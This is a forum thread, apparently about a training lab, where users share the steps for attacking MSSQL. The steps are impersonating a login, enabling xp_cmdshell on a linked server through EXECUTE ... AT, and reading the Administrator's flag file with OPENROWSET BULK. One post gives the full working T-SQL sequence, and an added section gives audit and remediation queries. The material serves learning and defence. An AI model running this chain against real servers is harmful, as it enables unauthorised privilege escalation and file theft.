Attacking Common Services - Hard

Finally :slight_smile: completed
-> user and pass
-> login to RDP using Remmina and use the sqlcmd command (or) use sqsh from your local machine
-> impersonate user
-> search more databases
-> check the user's privileges on other databases
-> be careful, this is very hard if you don't understand MSSQL commands
-> research xp_cmdshell
-> you need to enable it on the other database using the execute command; be very careful about the command you give
-> use ChatGPT; ask how to enable it on the other database from our database

Never Give Up. All the Best.

After impersonating as John, do we have to connect to the linked server or just execute commands from the current MSSQL server?

I am not able to enable xp_cmdshell with or without connecting to the linked server.

Can you please provide a little nudge here?


Update: I was able to figure it out.



Were you able to get the xp_cmdshell method to work? I had to do this an alternate way.

If you did use the xp_cmdshell can you PM me the steps you took? I am happy to share the method I used.

Hey, No Worries My Friend

These Are The Commands This Will Enable XP_CMDSHELL
[image]

But Keep In Mind That You Need To Enable It On The Other Database, So We Need To Modify The Commands As We Are Executing On The Other Database

Your Command Will Be Like This
EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure 'show advanced options', 1;

Don’t Forget To Reconfigure On That Database
EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV];


Thanks NeverAskWhy. I am going to try this one again using this method. I couldn’t figure out the syntax to get this to work. I appreciate the help.

Uhm, am I missing something? I impersonated the j user but I have no sysadmin privileges to continue.

UPDATE: got it! :slight_smile:

@J4rvis @johnnyvims Could you please help me, I can’t find a way to enable the xp_cmdshell after impersonating J… I need clear step-by-step advice, I have tried a lot of different methods described by HTB Academy but it doesn’t seem to work so I am not making any progress. I have read all the comments in this forum and sometimes get ideas but still can’t figure it out :frowning:


@StormBreaker11 after impersonating, u gotta follow the steps that @Neverakswhy posted 6 days ago. What u need to do is basically trigger xp_cmdshell not in the local db you’re in, but by sending queries to the linked db (that local.test.linked.srv). Understand the syntax to send commands to that linked db (the neveraskswhy user posted them), and first start by configuring advanced options, then reconfigure it, then once u’ve done that u just have to do the same, configuring xp_cmdshell.
After that, u can directly use xp_cmdshell to send cmd commands to that db and get the flag. Make sure to use the correct syntax for xp_cmdshell. Scroll above in here and there’s a screenshot from the user “Newuser” of 29 days ago suggesting the syntax; u just gotta correct that.
cheers!


@J4rvis Thanks for your quick reply. I have done exactly what @Neveraskswhy stated 6 days ago, but after impersonating as J… and following Neveraskswhy’s advice, I am still getting the following issue:

EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure 'show advanced options', 1
2> go
Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
1> EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
2> EXEC sp_configure 'show advanced options', 1;
3> go
Msg 15247, Level 16, State 1
Server 'WIN-HARD\SQLEXPRESS', Procedure 'sp_configure', Line 105
User does not have permission to perform this action.

What am I doing wrong?

I appreciate all your help.

You are close.
You have to figure out the name of the sysadmin at the linked database.
You can execute commands on the other database with a command formatted like this:
EXECUTE(' your command ') AT [LOCAL…]
Inside this command you can also put the impersonating command you have learned.
Also you can do more commands at once. You just have to put a semicolon between each of them, like:
EXECUTE(' first command ; second command ') AT [LOCAL…]

If you have a command containing a ' you need to add another ' to it. ('')

I have made it simple:

Obtain the password from the SMB share.

Log into the RDP session using the found credentials.

Impersonate using sqlcmd after establishing a session.

EXECUTE("SELECT * FROM OPENROWSET(BULK N'C:/Users/Administrator/Desktop/flag.txt', SINGLE_CLOB) AS Contents") AT [LOCAL.TEST.LINKED.SRV]

Happy Hacking.


Thanks @suryateja, I did manage to understand your point and made it after a lot of tries,
because I was facing a syntax error.
After you follow @suryateja’s steps, try this command :slight_smile:

EXECUTE("SELECT * FROM OPENROWSET(BULK N'C:/Users/Administrator/Desktop/flag.txt', SINGLE_CLOB) AS Contents") AT [LOCAL.TEST.LINKED.SRV]

Guys, how did you manage to enable xp_cmdshell? I did it using BULK, however I have no clue how it can be done with xp_cmdshell. I have tried multiple ways, but still keep getting an error. Any help would be appreciated. Thanks in advance.

Thank you @everyone for your help, you guys are awesome!!

Guys, I found the password of the user f**** and I could connect with RDP to the target machine. However, I couldn’t access the MSSQL database from the RDP session (SQL Server Management Studio) or with mssqlclient.py…
Could you please help with any hint regarding how to connect to the database? Maybe I need to use another password for the f*** user?

Thank you

This is a terrible lab. It took me a long time, so to help anyone out:

EXECUTE AS LOGIN = 'john'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
EXECUTE('sp_configure ''show advanced options'', 1') AT [LOCAL.TEST.LINKED.SRV]
GO
EXECUTE('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
GO
EXECUTE('EXECUTE sp_configure ''xp_cmdshell'', 1') AT [LOCAL.TEST.LINKED.SRV]
GO
EXECUTE('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
GO
EXECUTE('SELECT * FROM OPENROWSET(BULK N''C:/Users/Administrator/Desktop/flag.txt'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV]
GO

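The sequence above chains three server-level weaknesses: a login that may be impersonated, a linked server whose mapped remote login is a sysadmin on the far side, and an instance where xp_cmdshell (or bulk OPENROWSET) can be switched on. The T-SQL below is an added audit script for the DBA side, not a post from this thread and not part of the HTB lab; it assumes you run it with sysadmin (or VIEW ANY DEFINITION) on the instance you are reviewing, and it uses the thread's [LOCAL.TEST.LINKED.SRV], the login john and a placeholder [low_priv_login] purely as illustrative names.

```sql
-- Added audit example (not from the thread). Run on the instance under review.
-- Names [LOCAL.TEST.LINKED.SRV], [john] and [low_priv_login] are illustrative
-- assumptions; replace them with what the catalog views return for your server.

-- 1. Server-level grants that let one login act as another (EXECUTE AS LOGIN)
--    or read arbitrary files via OPENROWSET(BULK ...).
--    class 101 = SERVER_PRINCIPAL, so major_id is the impersonated login's id;
--    ADMINISTER BULK OPERATIONS is server-scoped and has no target principal.
SELECT grantee.name        AS grantee_login,
       p.permission_name,
       target.name         AS impersonated_login,   -- NULL for bulk permission
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals  AS grantee ON grantee.principal_id = p.grantee_principal_id
LEFT JOIN sys.server_principals AS target
       ON p.class = 101 AND target.principal_id = p.major_id
WHERE p.permission_name IN ('IMPERSONATE', 'ADMINISTER BULK OPERATIONS')
  AND p.state IN ('G', 'W');          -- GRANT / GRANT WITH GRANT OPTION

-- 2. Which logins are sysadmin here (impersonating any of them is full control).
SELECT name
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')         -- SQL login, Windows login, Windows group
  AND IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- 3. Linked servers that accept EXECUTE(...) AT, and the remote login each local
--    login is mapped to. A row with local_login NULL applies to every local
--    login; uses_self_credential = 0 with a fixed remote_name means everyone
--    who can reach the link runs as that remote account.
SELECT s.name                   AS linked_server,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       lp.name                  AS local_login,
       ll.uses_self_credential,
       ll.remote_name           AS remote_login
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 4. Current state of the options the thread toggles. value = configured,
--    value_in_use = active; a mismatch means sp_configure ran but RECONFIGURE
--    has not, which is itself worth investigating.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ad Hoc Distributed Queries');

-- Remediation, applied on whichever instance the findings came from.
-- Turn xp_cmdshell off and hide the advanced options again.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- Stop the link from accepting remote procedure calls unless a workload needs it.
EXEC sp_serveroption @server = N'LOCAL.TEST.LINKED.SRV', @optname = N'rpc out', @optvalue = N'false';

-- Remove the catch-all mapping so each local login must have an explicit,
-- least-privilege remote mapping instead of inheriting a sysadmin one.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'LOCAL.TEST.LINKED.SRV', @locallogin = NULL;

-- Revoke the impersonation grant that started the chain (illustrative names).
REVOKE IMPERSONATE ON LOGIN::[john] FROM [low_priv_login];
```

Re-run queries 1 to 4 after the remediation block; every row that named the linked server, the impersonation grant or xp_cmdshell = 1 should be gone, and the `value` / `value_in_use` columns should both read 0.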

Thank you @wfsahuo3 !

This is so helpful. and “duh!” realized the flag is on the local server not the linked remote server. I am curious where you got the syntax which is what must have taken you so long! All those quotes/double quotes!

No worries, glad I could help. Yeah, I think this lab was absolutely terrible, especially because the “example” that’s provided isn’t helpful at all. It took me a long time to figure out the positioning of all the quotes; it was basically a lot of trial and error. But remember you can use this syntax in the future to run other commands on the linked server as well.


I was a bit perplexed here too, but figured it out - you don’t get a “greeting” message when you connect successfully. You just get a prompt for your query “1>”.

Once logged in as Fiona through RDP, you can just run sqlcmd -H localhost in PowerShell, and you get a db session :).